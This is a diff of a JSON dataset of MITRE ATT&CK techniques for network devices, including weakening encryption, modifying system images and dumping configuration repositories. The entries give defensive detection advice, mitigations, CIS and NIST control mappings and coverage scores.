@@ -20134,63 +43360,78 @@
                 "url": "https://attack.mitre.org/mitigations/M1037"
             },
             {
-                "mid": "M1032",
-                "name": "Multi-factor Authentication",
-                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                "url": "https://attack.mitre.org/mitigations/M1032"
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
             },
             {
-                "mid": "M1027",
-                "name": "Password Policies",
-                "description": "Set and enforce secure password policies for accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1027"
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
             },
             {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
             }
         ],
-        "cumulative_score": 0.3547619047619048,
-        "adjusted_score": 0.3547619047619048,
+        "cumulative_score": 0.430952380952381,
+        "adjusted_score": 0.430952380952381,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
         "cis_controls": [
+            "3.12",
             "4.1",
             "4.2",
             "4.4",
-            "4.7",
-            "5.2",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.4",
-            "6.5",
-            "6.8",
+            "4.6",
+            "7.6",
+            "12.1",
             "12.2",
-            "13.4"
+            "12.8",
+            "13.3",
+            "13.4",
+            "13.8",
+            "18.2",
+            "18.3",
+            "18.5",
+            "3.10"
         ],
         "nist_controls": [
-            "AC-2",
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-20",
             "AC-3",
             "AC-4",
-            "AC-5",
-            "AC-6",
             "CA-7",
             "CM-2",
-            "CM-5",
             "CM-6",
             "CM-7",
-            "IA-2",
-            "IA-5",
+            "CM-8",
+            "IA-3",
+            "IA-4",
             "SC-28",
+            "SC-3",
+            "SC-4",
             "SC-7",
+            "SC-8",
             "SI-10",
+            "SI-12",
             "SI-15",
+            "SI-3",
             "SI-4",
             "SI-7"
         ],
@@ -20200,268 +43441,136 @@
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.3047619047619048,
-            "mitigation_score": 0.5818181818181818
+            "combined_score": 0.380952380952381,
+            "mitigation_score": 0.7272727272727273
         },
         "choke_point_score": 0.05,
         "prevalence_score": 0
     },
     {
-        "tid": "T1600",
-        "name": "Weaken Encryption",
-        "description": "Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)",
-        "url": "https://attack.mitre.org/techniques/T1600",
-        "tactics": [
-            "Defense Evasion"
-        ],
-        "detection": "There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.",
-        "platforms": [
-            "Network"
-        ],
-        "data_sources": [
-            "File: File Modification"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1600.001",
-                "name": "Weaken Encryption: Reduce Key Space",
-                "url": "https://attack.mitre.org/techniques/T1600/001",
-                "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)",
-                "detection": "There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1600.002",
-                "name": "Weaken Encryption: Disable Crypto Hardware",
-                "url": "https://attack.mitre.org/techniques/T1600/002",
-                "description": "Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.\n\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)",
-                "detection": "There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.",
-                "mitigations": []
-            }
-        ],
-        "mitigations": [],
-        "cumulative_score": 0.05,
-        "adjusted_score": 0.05,
-        "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": false,
-        "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
-        "process_coverage": false,
-        "network_coverage": false,
-        "file_coverage": true,
-        "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {},
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
-    },
-    {
-        "tid": "T1601",
-        "name": "Modify System Image",
-        "description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.",
-        "url": "https://attack.mitre.org/techniques/T1601",
+        "tid": "T1602.001",
+        "name": "Data from Configuration Repository: SNMP (MIB Dump)",
+        "description": "Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.\n\nAdversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) ",
+        "url": "https://attack.mitre.org/techniques/T1602/001",
         "tactics": [
-            "Defense Evasion"
+            "Collection"
         ],
-        "detection": "Most embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. \n\nCompare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.  (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)",
+        "detection": "Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)",
         "platforms": [
             "Network"
         ],
         "data_sources": [
-            "File: File Modification"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1601.001",
-                "name": "Modify System Image: Patch System Image",
-                "url": "https://attack.mitre.org/techniques/T1601/001",
-                "description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.  The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.  This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.  Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory.  This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).  Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.   When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.  By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \n\nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). \n\nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.  However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. ",
-                "detection": "Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)",
-                "mitigations": [
-                    {
-                        "mid": "M1046",
-                        "name": "Boot Integrity",
-                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
-                        "url": "https://attack.mitre.org/mitigations/M1046"
-                    },
-                    {
-                        "mid": "M1045",
-                        "name": "Code Signing",
-                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                        "url": "https://attack.mitre.org/mitigations/M1045"
-                    },
-                    {
-                        "mid": "M1043",
-                        "name": "Credential Access Protection",
-                        "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
-                        "url": "https://attack.mitre.org/mitigations/M1043"
-                    },
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            },
-            {
-                "tid": "T1601.002",
-                "name": "Modify System Image: Downgrade System Image",
-                "url": "https://attack.mitre.org/techniques/T1601/002",
-                "description": "Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage.  With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.  The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).  Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).  ",
-                "detection": "Many embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. ",
-                "mitigations": [
-                    {
-                        "mid": "M1046",
-                        "name": "Boot Integrity",
-                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
-                        "url": "https://attack.mitre.org/mitigations/M1046"
-                    },
-                    {
-                        "mid": "M1045",
-                        "name": "Code Signing",
-                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                        "url": "https://attack.mitre.org/mitigations/M1045"
-                    },
-                    {
-                        "mid": "M1043",
-                        "name": "Credential Access Protection",
-                        "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
-                        "url": "https://attack.mitre.org/mitigations/M1043"
-                    },
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            }
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1602",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1046",
-                "name": "Boot Integrity",
-                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
-                "url": "https://attack.mitre.org/mitigations/M1046"
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
             },
             {
-                "mid": "M1045",
-                "name": "Code Signing",
-                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                "url": "https://attack.mitre.org/mitigations/M1045"
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
             },
             {
-                "mid": "M1043",
-                "name": "Credential Access Protection",
-                "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
-                "url": "https://attack.mitre.org/mitigations/M1043"
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
             },
             {
-                "mid": "M1032",
-                "name": "Multi-factor Authentication",
-                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                "url": "https://attack.mitre.org/mitigations/M1032"
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
             },
             {
-                "mid": "M1027",
-                "name": "Password Policies",
-                "description": "Set and enforce secure password policies for accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1027"
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
             },
             {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
             }
         ],
-        "cumulative_score": 0.46190476190476193,
-        "adjusted_score": 0.46190476190476193,
+        "cumulative_score": 0.480952380952381,
+        "adjusted_score": 0.480952380952381,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [],
+        "cis_controls": [
+            "3.12",
+            "4.1",
+            "4.2",
+            "4.4",
+            "4.6",
+            "7.6",
+            "7.7",
+            "12.1",
+            "12.2",
+            "12.8",
+            "13.3",
+            "13.4",
+            "13.8",
+            "18.2",
+            "18.3",
+            "18.5",
+            "3.10"
+        ],
         "nist_controls": [
-            "AC-2",
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-20",
             "AC-3",
             "AC-4",
-            "AC-5",
-            "AC-6",
-            "CA-8",
+            "CA-7",
             "CM-2",
-            "CM-3",
-            "CM-5",
             "CM-6",
             "CM-7",
             "CM-8",
-            "IA-2",
-            "IA-5",
-            "IA-7",
-            "RA-9",
-            "SA-10",
-            "SA-11",
-            "SC-34",
-            "SI-2",
+            "IA-3",
+            "IA-4",
+            "SC-28",
+            "SC-3",
+            "SC-4",
+            "SC-7",
+            "SC-8",
+            "SI-10",
+            "SI-12",
+            "SI-15",
+            "SI-3",
             "SI-4",
-            "SI-7",
-            "SR-11",
-            "SR-4",
-            "SR-5",
-            "SR-6"
+            "SI-7"
         ],
         "process_coverage": false,
-        "network_coverage": false,
-        "file_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.36190476190476195,
-            "mitigation_score": 0.6909090909090909
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1602",
-        "name": "Data from Configuration Repository",
-        "description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)",
-        "url": "https://attack.mitre.org/techniques/T1602",
+        "tid": "T1602.002",
+        "name": "Data from Configuration Repository: Network Device Configuration Dump",
+        "description": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.\n\nAdversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. ",
+        "url": "https://attack.mitre.org/techniques/T1602/002",
         "tactics": [
             "Collection"
         ],
-        "detection": "Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)",
+        "detection": "Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)",
         "platforms": [
             "Network"
         ],
@@ -20469,100 +43578,9 @@
             "Network Traffic: Network Connection Creation",
             "Network Traffic: Network Traffic Content"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1602.001",
-                "name": "Data from Configuration Repository: SNMP (MIB Dump)",
-                "url": "https://attack.mitre.org/techniques/T1602/001",
-                "description": "Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.\n\nAdversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) ",
-                "detection": "Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)",
-                "mitigations": [
-                    {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    },
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    },
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
-                    },
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
-                    },
-                    {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
-                    }
-                ]
-            },
-            {
-                "tid": "T1602.002",
-                "name": "Data from Configuration Repository: Network Device Configuration Dump",
-                "url": "https://attack.mitre.org/techniques/T1602/002",
-                "description": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.\n\nAdversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. ",
-                "detection": "Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)",
-                "mitigations": [
-                    {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    },
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    },
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
-                    },
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
-                    },
-                    {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
-                    }
-                ]
-            }
-        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1602",
+        "subtechniques": [],
         "mitigations": [
             {
                 "mid": "M1041",
@@ -20601,8 +43619,8 @@
                 "url": "https://attack.mitre.org/mitigations/M1051"
             }
         ],
-        "cumulative_score": 0.430952380952381,
-        "adjusted_score": 0.430952380952381,
+        "cumulative_score": 0.5,
+        "adjusted_score": 0.5,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
@@ -20614,6 +43632,7 @@
             "4.4",
             "4.6",
             "7.6",
+            "7.7",
             "12.1",
             "12.2",
             "12.8",
@@ -20656,13 +43675,7 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.380952380952381,
-            "mitigation_score": 0.7272727272727273
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
         "tid": "T1606",
@@ -20759,12 +43772,165 @@
                 "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
                 "url": "https://attack.mitre.org/mitigations/M1026"
             },
-            {
-                "mid": "M1054",
-                "name": "Software Configuration",
-                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                "url": "https://attack.mitre.org/mitigations/M1054"
-            },
+            {
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.3023809523809524,
+        "adjusted_score": 0.3023809523809524,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "4.7",
